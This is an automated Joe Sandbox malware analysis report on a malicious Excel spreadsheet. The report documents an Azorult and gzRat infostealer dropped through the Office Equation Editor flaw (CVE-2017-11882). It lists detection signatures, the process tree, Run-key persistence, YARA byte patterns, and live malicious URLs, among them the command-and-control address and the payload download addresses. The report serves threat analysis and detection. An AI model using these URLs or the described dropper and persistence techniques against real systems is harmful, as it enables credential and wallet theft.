Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Scanjet 23002022.xlsx

Overview

General Information

Sample Name:Scanjet 23002022.xlsx
Analysis ID:579140
MD5:a7442eb728e243c9e2a06ebe73fc68f7
SHA1:26dbdea0866c5bc625e0d7568e0d65cc8d032be4
SHA256:1694fe96af5b61266748982c92df975d59bc5cff275f2526fc866685b7447335
Tags:VelvetSweatshopxlsx
Infos:

Detection

Azorult gzRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Azorult
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Azorult Info Stealer
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Yara detected gzRat
Multi AV Scanner detection for dropped file
Yara detected Costura Assembly Loader
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Suspicious Program Location with Network Connections
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Sigma detected: CurrentVersion Autorun Keys Modification
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Binary contains a suspicious time stamp
Drops PE files to the user directory
Uses Microsoft's Enhanced Cryptographic Provider
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Sigma detected: Autorun Keys Modification

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1156 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2124 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2640 cmdline: "C:\Users\Public\vbc.exe" MD5: 8620EEAF925B0C5943C5B0A217797A32)
      • cmd.exe (PID: 2864 cmdline: "C:\Windows\System32\cmd.exe" /c timeout 20 MD5: AD7B9C14083B52BC532FBA5948342B98)
        • timeout.exe (PID: 2068 cmdline: timeout 20 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
      • vbc.exe (PID: 1868 cmdline: C:\Users\Public\vbc.exe MD5: 8620EEAF925B0C5943C5B0A217797A32)
  • Pthmzffh.exe (PID: 2128 cmdline: "C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exe" MD5: 8620EEAF925B0C5943C5B0A217797A32)
    • cmd.exe (PID: 2364 cmdline: "C:\Windows\System32\cmd.exe" /c timeout 20 MD5: AD7B9C14083B52BC532FBA5948342B98)
      • timeout.exe (PID: 3052 cmdline: timeout 20 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
  • cleanup

Malware Configuration

Threatname: Azorult

{"C2 url": "http://clamprite.ga/azo01/index.php"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000000.602581852.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AzorultYara detected Azorult Info StealerJoe Security
    00000009.00000000.602581852.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Azorult_1Yara detected AzorultJoe Security
      00000009.00000000.602581852.0000000000400000.00000040.00000400.00020000.00000000.sdmpAzorult_1Azorult Payloadkevoreilly
      • 0x18878:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ...
      • 0x12cac:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
      00000009.00000000.602581852.0000000000400000.00000040.00000400.00020000.00000000.sdmpAzorultdetect Azorult in memoryJPCERT/CC Incident Response Group
      • 0x18618:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
      • 0x18c78:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
      • 0x1a360:$v2: http://ip-api.com/json
      • 0x18fd2:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
      00000004.00000002.608258288.00000000034F1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AzorultYara detected Azorult Info StealerJoe Security
        Click to see the 44 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        9.0.vbc.exe.400000.15.unpackJoeSecurity_AzorultYara detected Azorult Info StealerJoe Security
          9.0.vbc.exe.400000.15.unpackJoeSecurity_Azorult_1Yara detected AzorultJoe Security
            9.0.vbc.exe.400000.15.unpackAzorult_1Azorult Payloadkevoreilly
            • 0x17c78:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ...
            • 0x120ac:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
            9.0.vbc.exe.400000.15.unpackAzorultdetect Azorult in memoryJPCERT/CC Incident Response Group
            • 0x17a18:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
            • 0x18078:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
            • 0x19760:$v2: http://ip-api.com/json
            • 0x183d2:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
            4.2.vbc.exe.55b0000.7.unpackJoeSecurity_gzRatYara detected gzRatJoe Security
              Click to see the 69 entries

              Sigma Signatures

              Exploits

              barindex
              Sigma detected: EQNEDT32.EXE connecting to internet
              Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 192.210.218.119, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2124, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
              Sigma detected: File Dropped By EQNEDT32EXE
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2124, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

              System Summary

              barindex
              Sigma detected: Droppers Exploiting CVE-2017-11882
              Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2124, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 2640
              Sigma detected: Suspicious Program Location with Network Connections
              Source: Network ConnectionAuthor: Florian Roth: Data: DestinationIp: 172.67.166.49, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Users\Public\vbc.exe, Initiated: true, ProcessId: 2640, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49166
              Sigma detected: Execution from Suspicious Folder
              Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2124, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 2640
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exe", EventID: 13, EventType: SetValue, Image: C:\Users\Public\vbc.exe, ProcessId: 2640, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Pthmzffh
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton: Data: Details: "C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exe", EventID: 13, EventType: SetValue, Image: C:\Users\Public\vbc.exe, ProcessId: 2640, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Pthmzffh
              Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 1B 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2124, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: 00000004.00000002.608258288.00000000034F1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Azorult {"C2 url": "http://clamprite.ga/azo01/index.php"}
              Multi AV Scanner detection for submitted file
              Source: Scanjet 23002022.xlsxReversingLabs: Detection: 30%
              Antivirus detection for URL or domain
              Source: http://192.210.218.119/22/vbc.exeAvira URL Cloud: Label: malware
              Source: http://etapackbg.com/css/Sngggz.pngAvira URL Cloud: Label: malware
              Source: http://clamprite.ga/azo01/index.phphAvira URL Cloud: Label: malware
              Source: http://etapackbg.comAvira URL Cloud: Label: malware
              Source: http://clamprite.ga/azo01/index.phpAvira URL Cloud: Label: malware
              Source: http://etapackbg.com/css/Sngggz.png;Apwjojdzaicrizygsmmd.ZpaxmptxAvira URL Cloud: Label: malware
              Yara detected gzRat
              Source: Yara matchFile source: 4.2.vbc.exe.55b0000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vbc.exe.55b0000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vbc.exe.33694d0.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vbc.exe.33694d0.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.608692575.00000000055B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.607033085.0000000003361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeReversingLabs: Detection: 53%
              Machine Learning detection for dropped file
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJoe Sandbox ML: detected
              Source: C:\Users\Public\vbc.exeCode function: 9_2_004094C4 CryptUnprotectData,LocalFree,9_2_004094C4

              Exploits

              barindex
              Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exeJump to behavior
              Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
              Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: vbc.exe, 00000009.00000003.670503638.0000000004C48000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.650611198.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: vbc.exe, 00000009.00000003.670671423.0000000004C5C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.653828534.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670627117.0000000004C58000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670709418.0000000004C70000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670737148.0000000004C74000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: vbc.exe, 00000009.00000003.670982811.0000000003F2C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.657260286.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.657360630.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.656670065.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: vbc.exe, 00000009.00000003.658728603.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658927667.0000000003310000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671089018.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671329778.0000000003FB8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: vbc.exe, 00000009.00000003.668106753.0000000004BB4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.635922256.0000000004258000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668134020.0000000004BB8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668076743.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668160871.0000000004BBC000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668189443.0000000004BC0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.636520930.0000000004260000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdb source: vbc.exe, 00000009.00000003.663041050.0000000003310000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671483646.0000000004104000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671690389.0000000004124000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.661124964.0000000003430000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: vbc.exe, 00000009.00000003.668313210.0000000004BD8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668284155.0000000004BD4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668256853.0000000004BD0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668341274.0000000004BDC000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668393019.0000000004BE4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668368353.0000000004BE0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: vbc.exe, 00000009.00000003.668106753.0000000004BB4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668076743.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: vbc.exe, 00000009.00000003.670889097.0000000003ED8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.655968619.000000000425C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.656593935.00000000042B8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.656670065.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: vbc.exe, 00000009.00000003.669966606.0000000004C18000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669530663.0000000004BFC000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669494753.0000000004BF8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669037619.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669869061.0000000004C14000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669615990.0000000004C04000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669572778.0000000004C00000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669824164.0000000004C0C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669789751.0000000004C08000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668427612.0000000004BF0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.646010786.0000000004260000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: vbc.exe, 00000009.00000003.670394280.0000000004C30000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.649724763.0000000004268000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670466490.0000000004C38000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.649258580.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670421304.0000000004C34000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: vbc.exe, 00000009.00000003.654388488.000000000425C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670671423.0000000004C5C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.653828534.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.654424583.000000000425C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670627117.0000000004C58000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670709418.0000000004C70000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670765863.0000000004C78000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670737148.0000000004C74000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdb source: vbc.exe, 00000004.00000002.604891788.0000000000E60000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000004.00000002.608049872.0000000003483000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.607033085.0000000003361000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: vbc.exe, 00000009.00000003.668284155.0000000004BD4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668256853.0000000004BD0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.638371506.000000000426C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.637461851.0000000004268000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: vbc.exe, 00000009.00000003.669966606.0000000004C18000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670283394.0000000004C20000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669530663.0000000004BFC000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669494753.0000000004BF8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669037619.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669869061.0000000004C14000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669615990.0000000004C04000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669572778.0000000004C00000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670084410.0000000004C1C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669824164.0000000004C0C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.646924205.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669789751.0000000004C08000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668427612.0000000004BF0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: vbc.exe, 00000009.00000003.644622342.000000000426C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669530663.0000000004BFC000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669494753.0000000004BF8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669037619.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669615990.0000000004C04000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669572778.0000000004C00000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669824164.0000000004C0C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.645151858.0000000004270000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669789751.0000000004C08000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668427612.0000000004BF0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: vcruntime140.i386.pdbGCTL source: vbc.exe, 00000009.00000003.667949909.0000000003310000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671847447.000000000423C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671483646.0000000004104000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668042331.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671690389.0000000004124000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: vbc.exe, 00000009.00000003.648741288.0000000004260000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670394280.0000000004C30000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.649258580.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670421304.0000000004C34000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: vbc.exe, 00000009.00000003.670982811.0000000003F2C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.657260286.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.657360630.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.656670065.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: vbc.exe, 00000009.00000003.668106753.0000000004BB4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668134020.0000000004BB8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.635239654.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668076743.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: vbc.exe, 00000009.00000003.642227759.0000000004258000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669494753.0000000004BF8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669037619.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.641564050.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668427612.0000000004BF0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: vbc.exe, 00000009.00000003.633259338.0000000004C90000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: vbc.exe, 00000009.00000003.670889097.0000000003ED8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.655968619.000000000425C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.656593935.00000000042B8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.656670065.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp
